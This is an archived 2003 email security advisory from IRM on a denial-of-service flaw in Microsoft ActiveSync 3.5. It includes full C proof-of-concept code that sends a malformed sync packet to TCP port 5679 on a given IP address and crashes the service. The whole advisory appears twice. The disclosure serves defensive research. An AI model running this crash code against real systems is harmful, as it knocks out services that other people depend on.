IRM Advisories
21/03/03, 20:35
--=-J9snlwurRM58/72MDZr3
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-
IRM Security Advisory No. 004
ActiveSync version 3.5 Denial of Service Vulnerability
Vulnerablity Type / Importance: Denial of Service / High
Problem discovered: November 26th 2002
Vendor contacted: November 26th 2002
Advisory published: March 17th 2003
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-
Abstract:
~~~~~~~~~
"Microsoft ActiveSync allows you to create a partnership between your mobil=
e device and desktop computer using a cable, cradle, or infrared. After you=
create a partnership, you can synchronize your data using a modem or netwo=
rk (Ethernet) card if your device supports it. You can also use your existi=
ng computer to connect to other resources through ActiveSync." - quote from=
Microsoft ActiveSync help page.=20
The service runs on TCP port 5679 and by connecting to this port and sendin=
g a corrupted "sync request" packet the service can be crashed thus causing=
Denial of Service.
Description:
~~~~~~~~~~~~
By "pretending" to be an iPAQ and connecting to TCP port 5679, then sending=
a corrupted "I would like to sync with you" packet, a NULL pointer is dere=
ferenced in a call to the function WideCharToMultiByte() while it is trying=
to process an entry within the packet. This then causes an application err=
or, killing the "wcescomm" process.
The service must then be restarted manually to enable an iPAQ to re-sync.
Sample code to demonstrate the vulnerability is shown below:
/* iPAQ_Crash.c - by Andy Davis*/
/* Strictly for testing purposes only */
/* Compile with Microsoft VC++ */
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#define ASYNC_PORT 5679
int main(int argc, char **argv)
{
unsigned char sendBuf[] =3D
/* Correct Header */
//"\x00\x00\x00\x00" /* Correct start of packet - by removing these 4 bytes=
the crash occurs */=20
"\x6e\x00\x00\x00" /* Length of the rest of the packet */=20
"\x24\x00\x00\x00"=20
"\x03\x00\xa3\x2b"=20
"\x11\x0a\x00\x00"=20
"\x00\x00\x00\x00"=20
"\xc3\x1d\xdd\x0c" /* 0xc31ddd0c Device Identifier */=20
"\x00\x00\x00\x00"=20
"\x24\x00\x00\x00" /* 0x24 pointer to "Pocket_PC" */=20
"\x38\x00\x00\x00" /* 0x38 pointer to "PocketPC" */=20
"\x4a\x00\x00\x00" /* 0x4a pointer to "Compaq iPAQ H3800" */
/* "Pocket_PC PocketPC Compaq iPAQ H3800" (in unicode) */
"\x50\x00\x6f\x00\x63\x00\x6b\x00\x65\x00\x74\x00"
"\x5f\x00\x50\x00\x43\x00\x00\x00\x50\x00\x6f\x00\x 63\x00\x6b\x00"
"\x65\x00\x74\x00\x50\x00\x43\x00\x00\x00\x43\x00\x 6f\x00\x6d\x00"
"\x70\x00\x61\x00\x71\x00\x20\x00\x69\x00\x50\x00\x 41\x00\x51\x00"
"\x20\x00\x48\x00\x33\x00\x38\x00\x39\x00\x30\x00\x 00\x00";
struct sockaddr_in servAddr;
int s;
WSADATA WSAData;
if(WSAStartup (MAKEWORD(1,1), &WSAData) !=3D 0)
{
printf("WSAStartup failed.\n");
WSACleanup();
exit(1);
}
if (argc !=3D 2)
{
printf ("\niPAQ_Crash\n");
printf ("\nUsage: %s <target IP address>\n",argv[0]);
exit (1);
}
servAddr.sin_family =3D AF_INET;
servAddr.sin_addr.s_addr =3D inet_addr(argv[1]);
servAddr.sin_port =3D htons(ASYNC_PORT);
s =3D socket(AF_INET, SOCK_STREAM, 0);
connect(s, (struct sockaddr *) &servAddr, sizeof(servAddr));
printf("Sending packet...");
if ( send(s, sendBuf, 118, 0) =3D=3D 0)
{
printf("Error sending packet...quitting\n\n");
exit (0);
}
closesocket(s);
return(0);
}
Tested Versions:
~~~~~~ ~~~~~~~~~
ActiveSync version 3.5 (build 12007)=20
Tested Operating Systems:
~~~~~~ ~~~~~~~~~ ~~~~~~~~
Microsoft Windows 2000
Vendor & Patch Information:
~~~~~~ ~ ~~~~~ ~~~~~~~~~~~~
The vendor of this product, Microsoft, was contacted via email using the ad=
dress "security@microsoft.com" on 26th November 2002, Microsoft replied the=
following day to confirm receipt of the email. A second email was sent on =
7th January 2003 to the same address to request information regarding the p=
rogress of any patch or workaround information. Microsoft did not reply to =
this email and no further correspondance has been received about the vulner=
ability.
Workarounds:
~~~~~~~~~~~~
Unknown
Credits:
~~~~~~~~
Research & Advisory: Andy Davis=20
Disclaimer:
~~~~~~~~~~~
All information in this advisory is provided on an 'as is'
basis in the hope that it will be useful. Information Risk Management
Plc is not responsible for any risks or occurrences caused
by the application of this information.
A copy of this advisory may be found at
http://www.irmplc.com/advisories
The PGP key used to sign IRM advisories can be obtained from the above
URL, or from keyserver.net and its mirrors.
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-
Information Risk Management Plc.=20
http://www.irmplc.com, info@irmplc.com
22 Buckingham Gate=20
London=20
SW1E 6LB
+44 (0)207 808 6420
--=-J9snlwurRM58/72MDZr3
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQA+ezrjuAU46n6de2URAuCUAJ0aDGWukvYgWog9rMNiw7 +Tab++IQCfVTRW
isGOhJUQkbjAP6XRTIabRiI=
=rA2u
-----END PGP SIGNATURE-----
--=-J9snlwurRM58/72MDZr3--
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-
IRM Security Advisory No. 004
ActiveSync version 3.5 Denial of Service Vulnerability
Vulnerablity Type / Importance: Denial of Service / High
Problem discovered: November 26th 2002
Vendor contacted: November 26th 2002
Advisory published: March 17th 2003
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-
Abstract:
~~~~~~~~~
"Microsoft ActiveSync allows you to create a partnership between your mobil=
e device and desktop computer using a cable, cradle, or infrared. After you=
create a partnership, you can synchronize your data using a modem or netwo=
rk (Ethernet) card if your device supports it. You can also use your existi=
ng computer to connect to other resources through ActiveSync." - quote from=
Microsoft ActiveSync help page.=20
The service runs on TCP port 5679 and by connecting to this port and sendin=
g a corrupted "sync request" packet the service can be crashed thus causing=
Denial of Service.
Description:
~~~~~~~~~~~~
By "pretending" to be an iPAQ and connecting to TCP port 5679, then sending=
a corrupted "I would like to sync with you" packet, a NULL pointer is dere=
ferenced in a call to the function WideCharToMultiByte() while it is trying=
to process an entry within the packet. This then causes an application err=
or, killing the "wcescomm" process.
The service must then be restarted manually to enable an iPAQ to re-sync.
Sample code to demonstrate the vulnerability is shown below:
/* iPAQ_Crash.c - by Andy Davis*/
/* Strictly for testing purposes only */
/* Compile with Microsoft VC++ */
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#define ASYNC_PORT 5679
int main(int argc, char **argv)
{
unsigned char sendBuf[] =3D
/* Correct Header */
//"\x00\x00\x00\x00" /* Correct start of packet - by removing these 4 bytes=
the crash occurs */=20
"\x6e\x00\x00\x00" /* Length of the rest of the packet */=20
"\x24\x00\x00\x00"=20
"\x03\x00\xa3\x2b"=20
"\x11\x0a\x00\x00"=20
"\x00\x00\x00\x00"=20
"\xc3\x1d\xdd\x0c" /* 0xc31ddd0c Device Identifier */=20
"\x00\x00\x00\x00"=20
"\x24\x00\x00\x00" /* 0x24 pointer to "Pocket_PC" */=20
"\x38\x00\x00\x00" /* 0x38 pointer to "PocketPC" */=20
"\x4a\x00\x00\x00" /* 0x4a pointer to "Compaq iPAQ H3800" */
/* "Pocket_PC PocketPC Compaq iPAQ H3800" (in unicode) */
"\x50\x00\x6f\x00\x63\x00\x6b\x00\x65\x00\x74\x00"
"\x5f\x00\x50\x00\x43\x00\x00\x00\x50\x00\x6f\x00\x 63\x00\x6b\x00"
"\x65\x00\x74\x00\x50\x00\x43\x00\x00\x00\x43\x00\x 6f\x00\x6d\x00"
"\x70\x00\x61\x00\x71\x00\x20\x00\x69\x00\x50\x00\x 41\x00\x51\x00"
"\x20\x00\x48\x00\x33\x00\x38\x00\x39\x00\x30\x00\x 00\x00";
struct sockaddr_in servAddr;
int s;
WSADATA WSAData;
if(WSAStartup (MAKEWORD(1,1), &WSAData) !=3D 0)
{
printf("WSAStartup failed.\n");
WSACleanup();
exit(1);
}
if (argc !=3D 2)
{
printf ("\niPAQ_Crash\n");
printf ("\nUsage: %s <target IP address>\n",argv[0]);
exit (1);
}
servAddr.sin_family =3D AF_INET;
servAddr.sin_addr.s_addr =3D inet_addr(argv[1]);
servAddr.sin_port =3D htons(ASYNC_PORT);
s =3D socket(AF_INET, SOCK_STREAM, 0);
connect(s, (struct sockaddr *) &servAddr, sizeof(servAddr));
printf("Sending packet...");
if ( send(s, sendBuf, 118, 0) =3D=3D 0)
{
printf("Error sending packet...quitting\n\n");
exit (0);
}
closesocket(s);
return(0);
}
Tested Versions:
~~~~~~ ~~~~~~~~~
ActiveSync version 3.5 (build 12007)=20
Tested Operating Systems:
~~~~~~ ~~~~~~~~~ ~~~~~~~~
Microsoft Windows 2000
Vendor & Patch Information:
~~~~~~ ~ ~~~~~ ~~~~~~~~~~~~
The vendor of this product, Microsoft, was contacted via email using the ad=
dress "security@microsoft.com" on 26th November 2002, Microsoft replied the=
following day to confirm receipt of the email. A second email was sent on =
7th January 2003 to the same address to request information regarding the p=
rogress of any patch or workaround information. Microsoft did not reply to =
this email and no further correspondance has been received about the vulner=
ability.
Workarounds:
~~~~~~~~~~~~
Unknown
Credits:
~~~~~~~~
Research & Advisory: Andy Davis=20
Disclaimer:
~~~~~~~~~~~
All information in this advisory is provided on an 'as is'
basis in the hope that it will be useful. Information Risk Management
Plc is not responsible for any risks or occurrences caused
by the application of this information.
A copy of this advisory may be found at
http://www.irmplc.com/advisories
The PGP key used to sign IRM advisories can be obtained from the above
URL, or from keyserver.net and its mirrors.
=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-
Information Risk Management Plc.=20
http://www.irmplc.com, info@irmplc.com
22 Buckingham Gate=20
London=20
SW1E 6LB
+44 (0)207 808 6420
--=-J9snlwurRM58/72MDZr3
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQA+ezrjuAU46n6de2URAuCUAJ0aDGWukvYgWog9rMNiw7 +Tab++IQCfVTRW
isGOhJUQkbjAP6XRTIabRiI=
=rA2u
-----END PGP SIGNATURE-----
--=-J9snlwurRM58/72MDZr3--